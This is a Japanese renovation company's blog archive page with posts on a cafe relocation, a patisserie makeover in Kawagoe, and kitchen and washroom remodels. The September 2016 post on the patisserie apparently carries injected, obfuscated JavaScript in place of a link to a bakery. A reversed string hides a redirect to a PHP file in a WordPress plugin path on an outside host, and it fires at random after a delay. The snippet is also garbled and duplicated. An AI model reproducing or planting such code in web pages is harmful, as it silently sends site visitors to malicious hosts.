あれっ、3月だ。

2017年3月3日

1月は行く

2月は逃げる

3月は去る

 

・・・なんて表現しますが、2月はひとつもブログを投稿せずに逃げてしまいました(@_@;)

 

ホームスパイスはあっちとこっちと、そっちと・・・と、あれこれ現場進行中です。

 

その中で、ふじみ野市でカフェを営まれているお店の移転のお手伝いをしております。

 

IMG_0531_R

 

4月後半には移転オープン予定!

 

詳細はもう少し先で告知します。

 

のどかな風景の広がる、広~いお庭のある自宅カフェです!

 

 

 

Patissrie L’ange(パティスリールアンジュ)リニューアル工事完了♪

2016年10月1日

川越は南大塚駅南口のロータリーにある

パティスリールアンジュさん。

img_1719_r

Before

1週間お休みをしていただいて、リニューアル工事を行いました!

 

img_1792_r

After

工事途中経過はこんな感じで

オーナー、スタッフの方、お手伝いを積極的にしていただいてありがとうございました!

 

工事が楽しすぎて、「仕込みしてください!」と何度もオーナーとスタッフに仕込みを促してました(笑)

 

img_1818_r

スタッフAちゃんが激写。

終始笑いの絶えない1週間でした。

 

最終日にはルアンジュさんとの縁を繋いでくれたRamb’searの三浦さんがわざわざお祝いのお花を配達してくれました!

img_1797rambs_r

いつもウットリするアレンジで、ありがとうございます!

 

img_1815_r

アンティークの窓から外をのぞいてみました♪

 

ルアンジュさん、今までのカワイイイメージから一新、アンティークなお店になりました!

 

img_1800_r

西日が入りすぎて困っていたガラス面はショーウィンドウ風に。 アンティークを使ったランプと、季節の装飾を楽しめます。

 

img_1799_r

Ramb’searさんとでかけた仕入れで偶然見つけたアイアンフェンス。 ルアンジュさんのイメージにピッタリ! ビビッときて買い付けたら、ルアンジュさんにピッタリの寸法でした。 もう、これは運命ですね。

 

 

img_1786_r

ホームスパイスよりルアンジュさんに貸出中の古いレジスター。

 

img_1778_r

ショーウィンドウの店内側はゆったりとしたスペースが。ゆっくりケーキをセレクトしてもらえます。

 

img_1807_r

元々ルアンジュさんにあったアンティークガラス窓を付けてみました。

img_1782_r

ホームスパイスがお得意のアンティークで造作照明デス。

 

img_1788_r

年期の入ったショーケースはブルーグレーのペンキにエイジング塗装で蘇り!

 

ルアンジュのオーナーはRamb’searの大ファンで、何度も何度もお店に足を運んではため息をついていたそうです。

 

Ramb’searさんにアドバイスされて、ホームスパイスへご依頼いただきました。

 

ルアンジュさんとの縁をつなげてくれたRamb’searの三浦さんに感謝♪

 

img_1795_r

ルアンジュの皆さん、本当にありがとうございました!

皆さんの優しさに感謝デス。

見送りの際にはウルウルしてしましましたよ。

これからも美味しいケーキを沢山提供して下さいね!

川越南大塚「パティスリールアンジュ」改装工事中♪

2016年9月27日

川越は南大塚駅前南口にあるパティスリールアンジュさん

 

img_1719_r

 

改装工事進行中です♪

 

遅めの夏休みを取っていただいて、1週間で仕上げます!

 

img_1732_r

 

工期1週間ですから、とにかく段取りよく!

そして施主のルアンジュオーナーも作業要員として朝8時には出勤(笑)

 

楽しいスタッフさんや友人のお手伝いもあり、にぎやかに進行中です!

 

img_1765_r

 

埼玉のパン屋さんの中でも大人気の$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.php” target=”_blank”>ブーランジェリュネットさんもお手伝いに来てくださいました。

(2年ほど前にリュネットさんの店舗改装もお手伝いさせていただきました。)

 

 

img_1744_r

アンティークたちも無事届き

 

img_1755_r

img_1757_r

img_1768_r

 

遊んでるわけじゃないんです。

とっておきの場所がちと狭い(^_^;)

 

職人さんに「入れないよ~」と言われながら

「大丈夫。みんなが入るサイズにしておいたから」

と答えています(笑)

 

 

9月30日(金)がリニューアルオープンです!

 

 

 

築浅だけどリフォームしたい理由

2016年7月25日

 

立派な設備だけど、何かもの足りない・・・気に入らない・・・

注文住宅でも建売住宅でも良くある話です。

 

どうしてそんなことが起きるのか?特に注文住宅なのに?なぜ?

 

予算が無いという理由ではありません。

 

「ハウスメーカーで取り扱えない」ものもあります。

「施主の好みを理解できない」。これはただ単に建築施工側の勉強不足。

 

Tさんのお宅は高性能な家ですが、ハウスメーカーのオリジナル設備しか選べなかったことが心残りで、ご自分でDIYで何とかしようとされていました。

 

無料相談会で何度かお話しして、タイルを貼ってみようか、ペンキを塗ってみようか等々。

 

・・・しかし、どうしてもうまくいかない!ということで、ちょっとお得な制度を使って、新築から5年ですがリフォームに踏み切られました。

施工場所はキッチンと洗面所、そしてついでにリビングに漆喰を塗ることに。

 

beforek

 

現状→お客さんに見せたくないキッチンだけど、リビングに入ると丸見え。

どうせだったら見せてカワイイキッチンに!

ということで、施工後リビングに入るとまず視界入るのは・・・

 

IMG_0981_R

 

さわやかなフレッシュグリーンの塗装壁がアクセントのキッチン。

アイボリーのタイルに目地はグリーングレー。

 

IMG_0975_R

 

化粧梁をアクセントにして、照明器具もカワイイペンダントを幾つか。

Tさんが使っていたIKEAのカウンターは高さが高すぎて、使いづらかったとか。

そして白いペイントがちょっとこの空間には合わないな・・・ということでIKEA家具もリメイク。

グリーンの少し入ったアイボリーの板で横を囲い、対面収納にしました。

 

洗面所は

image

 

立派な洗面化粧台でしたが

吊戸棚は扉をペイントして再利用・陶器の洗面ボウルとカワイイ水栓の洗面台を造作。

 

IMG_0968_R

 

洗面台パーツとタイルをアップでみるとこんな感じです。

 

IMG_0875

レトロな丸ミックスタイル。

 

LDKには漆喰を塗って

IMG_1021_R

カーテンも新調しました!

 

 

完成後にお邪魔した時はM君の誕生日。

IMG_1022_R

 

Mくんのおばあちゃんが手づくりご飯でパーティの準備をされていました(*^_^*)

 

吊戸棚がなくなったので収納力が落ちたように見えますが、パントリーとカウンター下収納をカゴ収納で上手に利用されていました。

 

吊戸棚の収納は死蔵庫になってしまう方も多いと思います。

見えるところ、手の届きやすい所に必要な分だけ物を持つことが、「物を大事にする」基本なのだと思います。

 

そして使うもの置くものも厳選して、良いものを長く使うようにしたい・・・とおっしゃってました。

 

 

キッチン&洗面所リフォーム

2016年7月6日

Tさんご家族とは2年程前にラムズイヤーさんのイベントでの相談会で色々お話しさせていただき、今回、春の相談会で再度悩みを伺いました。

 

ずっと悩んでおられたのが

 

「新築時に選べなかったキッチンと洗面台がどうしても嫌で」

 

 

お家はとても立派な高性能住宅です。

 

ハウスメーカーの注文住宅は全てが好みのものになるか?と言うと、そうではありません(もちろん、全て想いの叶うメーカーもありますが)。

 

 

image

 

ホームスパイスにご相談に来られる方は、とても目が肥えてらっしゃる。

素材感や色合いにとても敏感です。

でもどうすればお気に入りの家になるかが分からなくて悩まれる方々です。

 

そんな方々のためにホームスパイスという会社があるんなだぁと、つくづく感じます。

 

image

 

もうすでに解体も終わり、キッチンも洗面台も設置。

タイルを貼って、仕上げ工事に突入しています。

 

リアルタイム情報はホームスパイスのFBをご覧くださいね。

2 / 1212345...10...最後 »